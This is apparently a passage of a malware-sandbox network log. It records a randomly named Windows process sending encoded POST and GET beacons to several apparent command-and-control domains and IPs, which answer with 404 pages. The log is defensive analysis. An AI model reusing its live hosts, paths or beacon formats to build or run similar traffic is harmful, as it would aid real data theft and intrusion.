6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                   15 | 192.168.2.5 | 49994 | 209.74.64.58 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   Nov 14, 2024 15:40:41.814821959 CET | 1676 | OUT | POST /afcr/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  Origin: http://www.pluribiz.life
                                                                                                                                                  Referer: http://www.pluribiz.life/afcr/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 69 4c 4c 35 43 39 75 2f 7a 2b 52 68 48 6c 59 57 4c 4b 53 4d 78 65 2b 4d 33 4c 53 64 4a 4a 6e 4b 52 34 41 55 53 46 4a 72 39 31 33 2b 33 2b 4f 62 2b 53 32 55 54 51 63 57 75 66 36 45 52 70 69 48 62 7a 6d 61 57 44 65 5a 77 52 6c 48 35 30 48 69 4c 39 56 79 67 50 43 4f 69 57 54 5a 6f 66 73 33 44 57 31 74 68 4e 50 57 64 77 62 68 77 61 41 5a 46 51 39 4d 44 2f 7a 53 6a 55 64 59 49 4b 42 53 39 32 65 43 72 50 62 4e 6d 78 2f 46 2f 4b 49 4f 68 61 54 45 2f 31 53 51 31 78 39 77 59 30 32 64 [TRUNCATED]
                                                                                                                                                   Data Ascii: W638b4U=… [TRUNCATED]
                                                                                                                                                   Nov 14, 2024 15:40:42.497665882 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:42 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                   16 | 192.168.2.5 | 49995 | 209.74.64.58 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   Nov 14, 2024 15:40:44.361145020 CET | 382 | OUT | GET /afcr/?Xll=50hLc0Hhy&W638b4U=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8CGv24SZJcM9CuKerlXN+FNsiyWCFzy1PjnGczRtZq9rVpg== HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                   Nov 14, 2024 15:40:45.028980970 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:44 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                   17 | 192.168.2.5 | 49996 | 47.242.89.146 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   Nov 14, 2024 15:40:50.575277090 CET | 630 | OUT | POST /1iqa/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  Origin: http://www.kdtzhb.top
                                                                                                                                                  Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 64 6e 45 42 6e 57 71 42 45 57 74 67 69 59 43 70 39 46 48 5a 7a 5a 75 6c 6d 53 56 36 50 4e 38 44 2b 6c 43 67 58 30 3d
                                                                                                                                                  Data Ascii: W638b4U=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcYdnEBnWqBEWtgiYCp9FHZzZulmSV6PN8D+lCgX0=
                                                                                                                                                   Nov 14, 2024 15:40:51.547610044 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:51 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                   18 | 192.168.2.5 | 49997 | 47.242.89.146 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   Nov 14, 2024 15:40:53.125857115 CET | 650 | OUT | POST /1iqa/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  Origin: http://www.kdtzhb.top
                                                                                                                                                  Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 31 57 31 31 61 69 72 2f 73 56 5a 64 31 79 2b 41 69 47 36 4a 6e 2b 4b 6a 31 4a 4a 46 44 5a 2b 6d 52 68 6b 34 48 61
                                                                                                                                                  Data Ascii: W638b4U=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT1W11air/sVZd1y+AiG6Jn+Kj1JJFDZ+mRhk4Ha
                                                                                                                                                   Nov 14, 2024 15:40:54.075934887 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:53 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                   19 | 192.168.2.5 | 49998 | 47.242.89.146 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                   Nov 14, 2024 15:40:55.679090023 CET | 1667 | OUT | POST /1iqa/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  Origin: http://www.kdtzhb.top
                                                                                                                                                  Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 43 74 37 42 59 44 6f 50 46 75 66 44 51 37 37 46 32 67 33 6f 55 31 55 65 35 62 33 7a 53 6c 35 4d 65 58 4e 6d 41 4a 47 47 47 63 67 6a 64 6e 30 39 53 73 38 76 2b 6c 71 78 44 2b 55 66 39 66 4f 74 55 41 6b 31 41 2b 79 36 56 4f 4c 4f 76 2f 30 42 6b 71 65 33 73 35 65 36 33 4a 44 6a 2f 37 53 55 45 77 6f 74 58 49 54 72 6c 4c 4e 71 6d 64 73 50 34 52 4a 30 37 53 71 77 39 37 6e 48 30 63 59 73 32 4e 6b 4e 68 32 33 73 2b 64 5a 30 56 4a 75 51 69 4a 71 4f 6c 55 4e 72 38 64 47 68 42 51 54 61 [TRUNCATED]
                                                                                                                                                   Data Ascii: W638b4U=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciCt7BYDoPFufDQ77F2g3oU1Ue5b3zSl5MeXNmAJGGGcgjdn09Ss8v+lqxD+Uf9fOtUAk1A+y6VOLOv/0Bkqe3s5e63JDj/7SUEwotXITrlLNqmdsP4RJ07Sqw97nH0cYs2NkNh23s+dZ0VJuQiJqOlUNr8dGhBQTa [TRUNCATED]
                                                                                                                                                   Timestamp: Nov 14, 2024 15:40:56.647399902 CET   Bytes transferred: 691   Direction: IN
                                                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                   Session ID: 20   Source IP: 192.168.2.5   Source Port: 49999   Destination IP: 47.242.89.146   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:40:58.223109007 CET   Bytes transferred: 379   Direction: OUT
                                                                                                                                                   GET /1iqa/?W638b4U=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQjSyqzKDi3Wbpu+VrwdU4dvabDPmYf5pusJWuBQDberj5Ig==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                   Timestamp: Nov 14, 2024 15:40:59.211580992 CET   Bytes transferred: 691   Direction: IN
                                                                                                                                                   HTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:59 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                   Session ID: 21   Source IP: 192.168.2.5   Source Port: 50000   Destination IP: 128.65.195.180   Destination Port: 80   PID: 4068   Process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                   Timestamp: Nov 14, 2024 15:41:04.457319021 CET   Bytes transferred: 636   Direction: OUT
                                                                                                                                                   POST /293d/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  Origin: http://www.evoo.website
                                                                                                                                                  Referer: http://www.evoo.website/293d/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
